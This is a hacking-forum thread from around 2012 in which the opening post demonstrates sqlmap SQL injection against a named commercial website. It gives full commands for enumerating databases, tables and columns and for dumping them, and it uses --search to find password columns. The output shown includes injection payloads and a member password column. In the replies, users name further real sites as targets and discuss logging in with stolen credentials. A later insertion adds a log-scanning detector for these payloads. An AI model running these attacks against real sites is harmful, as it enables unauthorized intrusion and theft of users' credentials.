[SHARE] sqlmap using the '--search' option
#1
assalamualaikum wr wb
morning everyone

it's been a while since I shared any tricks and tips, I've missed it ^_^
hmm, this time I want to share something about using sqlmap.

so far, sqlmap usage has pretty much always looked like this
(for the example only, please don't hammer the site)
Code:
1. junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 --random-agent --threads 10 --banner
then
junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 --random-agent --threads 10 --dbs
or
junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 --dbs

2. junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 --random-agent --threads 10 -D dbname --tables

3. junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 --random-agent --threads 10 -D dbname -T tbl_name --columns

4. junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 --random-agent --threads 10 -D dbname -T tbl_name -C clm_name1,clm_name2,... --dump

now here
I no longer follow exactly the steps above.
I use the --search option to look directly for the login table, or for a table that looks like it has a login or password column, so it can replace the --tables and --columns options.

ok, straight to it
Code:
junior@riau:/pentest/database/sqlmap# ./sqlmap.py -u http://www.kingkitchen.co.th/product/category.php?CID=14 --threads 10 -D kingkitc_kkcdb --search -C pass,user

    sqlmap/1.0-dev (r5131) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 05:54:43

[05:54:43] [INFO] using '/pentest/web/scanners/sqlmap/output/www.kingkitchen.co.th/session' as a session file
[05:54:43] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[05:54:43] [INFO] testing connection to the target url
[05:54:44] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: CID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: CID=14 AND 6999=6999

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: CID=14 AND (SELECT 2410 FROM(SELECT COUNT(*),CONCAT(0x3a686d633a,(SELECT (CASE WHEN (2410=2410) THEN 1 ELSE 0 END)),0x3a6177753a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: CID=14 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a686d633a,0x6b595675485144425450,0x3a6177753a), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: CID=14 AND SLEEP(5)
---

[05:54:44] [INFO] the back-end DBMS is MySQL

web application technology: Apache 2.0.64, PHP 5.2.9
back-end DBMS: MySQL 5.0
do you want sqlmap to consider provided column(s):
[1] as LIKE column names (default)
[2] as exact column names
> 1

[05:54:46] [INFO] searching columns like 'pass' in database 'kingkitc_kkcdb'
[05:54:47] [INFO] the SQL query used returns 1 entries
[05:54:48] [INFO] retrieved: kingkitc_kkcdb
[05:54:48] [INFO] retrieved: MEMBER
[05:54:48] [INFO] fetching columns like 'pass' for table 'MEMBER' in database 'kingkitc_kkcdb'
[05:54:50] [INFO] the SQL query used returns 1 entries
[05:54:50] [INFO] retrieved: MPassword
[05:54:51] [INFO] retrieved: varchar(10)
[05:54:51] [INFO] searching columns like 'user' for table 'MEMBER' in database 'kingkitc_kkcdb'
[05:54:51] [INFO] fetching columns like 'user' for table 'MEMBER' in database 'kingkitc_kkcdb'
[05:54:53] [ERROR] unable to retrieve the columns for any table in database 'kingkitc_kkcdb'
Columns like 'user' were found in the following databases:
Columns like 'pass' were found in the following databases:
Database: kingkitc_kkcdb
Table: MEMBER
[1 column]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| MPassword | varchar(10) |
+-----------+-------------+

do you want to dump entries? [Y/n] n

[05:57:34] [INFO] fetched data logged to text files under '/pentest/web/scanners/sqlmap/output/www.kingkitchen.co.th'

[*] shutting down at 05:57:34

the --search option is always followed by the option -C parameter1,parameter2,... and the option -T parameter1,parameter2,..., or just one of the two.

Code:
-C is used to search column names in the database based on the parameter(s) you pass in

-T is used to search table names in the database based on the parameter(s) you pass in

so from the result we immediately know the table name, right?
then all that is left is to dump that table directly.

ok ok, that's all from me for now
it's already past 6, I'll be late for school ^_^

junior signing off

regards

junior dragon
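
As an added defender-side example (not from the post or from sqlmap), here is a small Python check that flags the four payload families sqlmap reported above (boolean-based, error-based, UNION, time-based) in a web server's access log; the log lines are constructed and the client IPs are placeholders. Since the post uses --random-agent, the User-Agent header is not a reliable signal, so the rules match the decoded query string instead.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache access-log lines (not from the post); the query strings
# mirror the four payload types sqlmap listed in the post's output.
SAMPLE_LOG = r"""
203.0.113.5 - - [29/Jun/2012:05:54:43 +0700] "GET /product/category.php?CID=14 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [29/Jun/2012:05:54:44 +0700] "GET /product/category.php?CID=14%20AND%206999%3D6999 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [29/Jun/2012:05:54:44 +0700] "GET /product/category.php?CID=14%20AND%20%28SELECT%202410%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 HTTP/1.1" 500 812 "-" "Mozilla/5.0"
203.0.113.5 - - [29/Jun/2012:05:54:45 +0700] "GET /product/category.php?CID=14%20LIMIT%201%2C1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 HTTP/1.1" 200 5211 "-" "Mozilla/5.0"
203.0.113.5 - - [29/Jun/2012:05:54:46 +0700] "GET /product/category.php?CID=14%20AND%20SLEEP%285%29 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [29/Jun/2012:06:01:00 +0700] "GET /product/category.php?CID=7 HTTP/1.1" 200 4980 "-" "Mozilla/5.0"
"""

# Common/combined log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# One rule per technique, named after the "Type:" lines in the sqlmap output.
RULES = [
    ("boolean-based blind", re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I)),
    ("error-based", re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I)),
    ("UNION query", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    ("time-based blind", re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I)),
]

def classify_request(path):
    """Return the technique names whose signature appears in the URL-decoded path."""
    decoded = unquote_plus(path)
    return [name for name, rx in RULES if rx.search(decoded)]

def scan_log(text):
    """Parse access-log lines; return (ip, parameter, technique) for every matched rule."""
    hits = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path")
        techniques = classify_request(path)
        if not techniques:
            continue
        # the first query-string key is the parameter carrying the payload here
        query = path.partition("?")[2]
        param = query.split("=", 1)[0] if "=" in query else ""
        for t in techniques:
            hits.append((m.group("ip"), param, t))
    return hits

def summarize(hits):
    """Distinct techniques per source IP: several techniques from one IP within seconds is the sqlmap pattern."""
    per_ip = {}
    for ip, _, technique in hits:
        per_ip.setdefault(ip, set()).add(technique)
    return {ip: sorted(t) for ip, t in per_ip.items()}
```

Point `scan_log` at a real log file's contents and feed `summarize` into alerting; a single IP that trips three or four rules against the same parameter in a short window is worth a look even when every request returned 200.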

#2
wow..
cool..
oh yeah, how do you find the admin login, bro??
I do it manually, e.g.: http://www.wedusgibas.com/admin
sometimes it works, sometimes it doesn't.. if I use a tool in BT, what's it called?? :)
Wong PATI Asli - Pr4J4P4t1

#3
thanks for the share, +2 from me :)

#4
(06-29-2012, 06:51 PM)Daddes Wrote: wow..
cool..
oh yeah, how do you find the admin login, bro??
I do it manually, e.g.: http://www.wedusgibas.com/admin
sometimes it works, sometimes it doesn't.. if I use a tool in BT, what's it called?? :)

try looking up dirbuster

#5
(06-29-2012, 08:08 PM)konspirasi Wrote: thanks for the share, +2 from me :)

just got in, +1 bro :)

#6
(06-29-2012, 07:13 AM)junior.riau18 Wrote: assalamualaikum wr wb

awesome, bro, nice share :)

#7
Awesome, bro, good stuff for learning something new
root@zombie:~# echo gua ganteng thank you Smile) > /var/log/syslog

#8
wow, finally what I asked for got posted
thanks jeng juni nan sexy, more reading material for me
plus 1 from me, check your dispenser
there's a frog teroret teroret on the riverbank teroret teroret looking for food teroret teroret every morning teroret teroret

visit: http://warungiso.blogspot.com/

I was not smart or special but I was unix

#9
(06-29-2012, 07:13 AM)junior.riau18 Wrote: assalamualaikum wr wb

awesome tips :D
would it work on ww.capjikia.com/admin, bro? :)

#10
Is it just me, or these days the passwords we get are always encrypted and it always comes out wrong when trying to decrypt them?

tried logging in on the site, it doesn't match what I got from the SQLi

any solution?

I've tried this on many sites, more than 10, and got the pass and user, but unfortunately I have never once been able to log in to a site I tested with sqlmap or havij